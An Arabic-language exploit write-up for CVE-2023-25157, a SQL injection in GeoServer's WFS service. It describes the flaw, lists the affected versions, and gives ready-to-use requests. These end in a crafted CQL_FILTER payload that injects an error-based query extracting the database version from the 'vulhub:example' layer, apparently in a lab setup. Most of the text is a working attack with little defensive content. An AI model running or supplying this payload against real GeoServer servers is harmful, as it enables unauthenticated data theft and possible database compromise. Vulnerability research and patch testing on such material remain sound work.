
استغلال لـ CVE-2023-25157: حقن SQL في خدمة WFS الخاصة بـ GeoServer عبر صيغة مرشح CQL مصممة بعناية، مما يتيح استخراج البيانات عن بُعد دون مصادقة واحتمال اختراق خادم قاعدة البيانات.
نظرًا لعدم تصفية إدخال المستخدم، يمكن للمهاجم غير المصرح له عن بعد بناء صيغة تصفية غير طبيعية، لتجاوز التحليل المعجمي لـ GeoServer مما يؤدي إلى حقن SQL، والحصول على معلومات حساسة من الخادم، وربما الحصول على صلاحيات خادم قاعدة البيانات.
GeoServer 2.20.x < 2.20.7
GeoServer 2.19.x < 2.19.7
GeoServer 2.18.x < 2.18.7
GeoServer 2.21.x < 2.21.4
GeoServer 2.22.x < 2.22.2
بحث
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

اسم الوظيفة vulhub:example للحصول على الخصائص ذات الصلة
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true



